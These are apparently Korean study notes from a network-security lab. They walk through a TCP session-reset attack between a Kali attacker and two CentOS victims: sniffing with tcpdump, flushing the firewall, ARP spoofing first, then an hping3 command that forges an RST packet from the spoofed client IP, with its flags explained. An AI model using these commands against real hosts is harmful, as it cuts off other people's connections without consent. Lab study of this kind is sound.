공격자 : kali (100.100.100.15)
Client 피해자 : CentOS 6.9 (100.100.100.17)
서버 피해자 : CentOS 7.6 (100.100.100.18) -> 모니터링 => applications - system tools - system monitor
tcpdump -S -n port 4000
Tcpdump
지정한 네트워크 인터페이스(이더넷, 랜카드)로 송수신되는 데이터의 패킷전체 혹은 패킷헤드만을 모니터링하거나 덤프할 때 사용하는 프로그램이다.
프로그램 특성상, 네트워크 인터페이스를 아주 심도 있게 사용하기 때문에, 실행하는 사람은 반드시 네트워크 인터페이스에 대한 읽기권한이 있어야만 한다.
캡쳐한 데이터 패킷을 분석하여 네트워크나 서버의 응용서비스들의 문제점에 대해 분석하는 도구로 사용될 수 있다.
CentOS 6.9
nc 100.100.x.18 4000
//이후 연결 메시지 보내기 HELLO WORLD!
CentOS 7.6
sudo iptables -F // 방화벽 비활성화
nlc -l 4000
칼리에서 arp 공격 먼저 선행해야 함.
kali에서 dump 결과 확인
최종적으로 클라이언트의 Sequence 번호이자 서버의 ACK 번호 확인.
시작 포트 번호와 도착 포트 번호 또한 기록
hping3 -s s_port -p 4000 -a 100.100.100.17 -M 1249983982 -L 0 -R -c 1 100.100.100.18
-s : 출발지 포트
-p : 도착지 포트
-a : 스푸핑 IP
-M : Sequence 번호
-L : Ack Number (현재 RST 패킷을 전송하는데 Ack 번호가 필요하지 않음)
-R : RST 플래그 생성
-c [int] : 보낼 패킷의 수
TCP 연결 강제 연결 종료르 확인한다.
CentOS 6.9
--